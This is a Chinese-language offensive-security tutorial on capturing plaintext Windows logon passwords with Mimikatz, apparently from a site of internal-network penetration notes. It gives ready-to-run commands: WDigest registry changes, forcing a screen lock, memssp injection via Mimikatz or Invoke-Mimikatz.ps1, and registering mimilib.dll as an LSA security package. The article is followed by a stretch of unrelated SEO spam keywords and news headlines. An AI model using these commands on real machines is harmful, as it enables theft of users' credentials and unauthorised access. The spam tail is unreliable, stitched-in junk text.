Mimikatz 获取 Windows 高版本明文密码

0x01 改注册表(mimitaze存在免杀问题)

ps:需要锁屏等方式
修改成记录明文密码
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Mimikatz 获取 Windows 高版本明文密码 - 图1
修改不记录明文密码
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
锁屏
rundll32.exe user32.dll,LockWorkStation
修改完之后使用命令锁屏,接下来等待用户再次登录一次就可以抓到了
Mimikatz 获取 Windows 高版本明文密码 - 图2

0x02 Mimikatz 插 ssp 记录密码

ps:需要锁屏等方式
使用mimikatz的一个功能:
privilege::debug、misc::memssp
修改完之后使用以下命令锁屏,等用户进入后就可以在C:\Windows\System32\mimilsa.log里面存储登录的密码
rundll32.exe user32.dll,LockWorkStation
Mimikatz 获取 Windows 高版本明文密码 - 图3

0x03 使用 Invoke-Mimikatz.ps1

ps:需要锁屏等方式
Import-Module .\Invoke-Mimikatz.ps1 //导入命令 Invoke-Mimikatz -Command “misc::memssp” //不需要重启获取 记录的明文密码存储在这个路径下
Invoke-Mimikatz.ps1
https://download.cisp-pte.com/安全工具/Mimikatz/mimidogz-master.zip
Mimikatz 获取 Windows 高版本明文密码 - 图4

0x04 复制mimilib.dll+修改注册表

ps:需要重新启动系统
(1) 在mimikatz中有32和64两个版本,安装包里分别都带有不同位数的mimilib.dll
Mimikatz 获取 Windows 高版本明文密码 - 图5
(2) 将对应版本的dll文件复制到 c:\windows\system32下
(3) 将以下注册表位置中Security Packages的值设置为mimilib.dll
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v “Security Packages” /t REG_MULTI_SZ /d mimilib.dll /f
(4) 等待系统重启后,在c:\windows\system32生成文件kiwissp.log,记录当前用户的明文口令
Mimikatz 获取 Windows 高版本明文密码 - 图6

若有收获,就点个赞吧

0 人点赞

  • 书签
  • 添加书签 移除书签
  • 内网工具 & CS
    • 常规内网渗透
    • cobaltstrike 学习
    • CobaltStrike的改造
  • 域渗透学习
    • 内网渗透-个人域场景思路总结
    • 域渗透-ACL攻防
    • 域信息收集-Bloodhound
  • 域渗透-委派
    • 非约束委派拿下域控
    • 约束委派拿下某主机
    • 基于资源的约束委派拿下主机
  • 域横向
    • 域密码喷洒Password Spraying
    • 【永恒之黑】CVE-2020-0796复现
    • 域渗透-NET-NTLM与SMB relay
    • 关于MSCASH(域登录缓存)的一些记录
    • 内网横向-kerberoasting离线攻击
    • 域下的GPP密码读取
  • 关于域控
    • CVE-2021-42287/CVE-2021-42278复现
    • CVE-2021-1675复现
    • CVE-2020-1472复现
    • MS14-068复现
    • 域控权限维持——SSP+DSRM+SIDHistory
    • 域控权限维持——Kerberos与黄金白银票据(PTT)
    • 域控权限维持——Skeleton Key+Hook PasswordChangeNotify
    • 关于域控的ntds.dit
    • 基于域信任的跨域SID Histrory 黄金票据
    • 跨域之间的信任和攻击
  • 1、隧道转发的技术
    • LDAP隧道传输
    • windows下的NC——powercat
    • DNS隧道-DNSCAT的使用
    • proxychains-ng使用
    • Venom的多级转发代理
    • frp内网代理转发
    • SSH隧道
    • ICMP隧道
  • 2、维持权限
    • Linux维持权限
    • Window下常用维持权限手法
  • 3、内网信息收集Tips
    • mimikatz读取以及其他方式读取
    • 内网渗透——关于RDP及端口限制
    • 单机信息收集之非本地系统Pass-Get
    • Linux获得shell后密码的获取
    • strace进行Linux密码的获取
    • 转载】linux渗透测试CheckList
  • 4、内网提权的Tip
    • 1-Windows常规提权
    • 2-Windows Bypass UAC
    • 3-通过Windows令牌进行提权
    • 4-Linux常规提权
    • 5-Linux提权之如何bypass rbash【翻译】
  • 5、横向移不动
    • PTK-Pass The Key
    • DCOM的横向移动
    • 横向移动工具集合
    • Winrm 的远程主机控制
    • PassTheHash-哈希获取
    • Mimikatz 获取 Windows 高版本明文密码
    • IPC的利用
  • 6、稍微的清理痕迹
    • Windows清理入侵痕迹
    • Linux清除日志
  • 7、其他Others
    • 其他的内网远控产品
    • Windows DPAPI学习
    • 一句话Powershell反弹shell
    • Windows Defender白名单
    • pystinger上线不出网的机器
    • 端口复用实操
    • msf常用+以及多方式ms17-010打击内网
    • cmdkey /list密码获取
    • 令牌窃取和potato家族利用理解
    • 向日葵配置文件密码获取
    • Todesk让你内网变得更简单
    • NTLM与Kerberos-From daiker
暂无相关搜索结果!
    展开/收起文章目录

    玻璃钢生产厂家做玻璃钢花盆的模具什么价格青岛常见玻璃钢花盆玻璃钢不锈钢雕塑厂江苏大型商场美陈供应商场外场ip美陈绍兴商场美陈售价新密玻璃钢卡通座椅雕塑中国台湾玻璃钢雕塑介绍沈阳抽象玻璃钢雕塑十一国庆商场美陈图片清远玻璃钢仿铜雕塑江苏商场中秋美陈滨州玻璃钢花盆批发哈尔滨玻璃钢雕塑品牌好洛阳室外玻璃钢雕塑厂家玻璃钢熊大熊二雕塑雕塑玻璃钢什么牌子好新乡玻璃钢卡通雕塑上海卡通玻璃钢动物大象雕塑思明园林玻璃钢雕塑直销大型主题商场美陈供应河西商场美陈北京大型主题商场美陈哪里买古代玻璃钢雕塑手工制作大型商场春节美陈布置和田商场美陈杭州美陈商场鹰潭水果玻璃钢雕塑优势普陀区进口玻璃钢雕塑诚信企业天水广场玻璃钢雕塑制作香港通过《维护国家安全条例》两大学生合买彩票中奖一人不认账让美丽中国“从细节出发”19岁小伙救下5人后溺亡 多方发声单亲妈妈陷入热恋 14岁儿子报警汪小菲曝离婚始末遭遇山火的松茸之乡雅江山火三名扑火人员牺牲系谣言何赛飞追着代拍打萧美琴窜访捷克 外交部回应卫健委通报少年有偿捐血浆16次猝死手机成瘾是影响睡眠质量重要因素高校汽车撞人致3死16伤 司机系学生315晚会后胖东来又人满为患了小米汽车超级工厂正式揭幕中国拥有亿元资产的家庭达13.3万户周杰伦一审败诉网易男孩8年未见母亲被告知被遗忘许家印被限制高消费饲养员用铁锨驱打大熊猫被辞退男子被猫抓伤后确诊“猫抓病”特朗普无法缴纳4.54亿美元罚金倪萍分享减重40斤方法联合利华开始重组张家界的山上“长”满了韩国人?张立群任西安交通大学校长杨倩无缘巴黎奥运“重生之我在北大当嫡校长”黑马情侣提车了专访95后高颜值猪保姆考生莫言也上北大硕士复试名单了网友洛杉矶偶遇贾玲专家建议不必谈骨泥色变沉迷短剧的人就像掉进了杀猪盘奥巴马现身唐宁街 黑色着装引猜测七年后宇文玥被薅头发捞上岸事业单位女子向同事水杯投不明物质凯特王妃现身!外出购物视频曝光河南驻马店通报西平中学跳楼事件王树国卸任西安交大校长 师生送别恒大被罚41.75亿到底怎么缴男子被流浪猫绊倒 投喂者赔24万房客欠租失踪 房东直发愁西双版纳热带植物园回应蜉蝣大爆发钱人豪晒法院裁定实锤抄袭外国人感慨凌晨的中国很安全胖东来员工每周单休无小长假白宫:哈马斯三号人物被杀测试车高速逃费 小米:已补缴老人退休金被冒领16年 金额超20万

    玻璃钢生产厂家 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化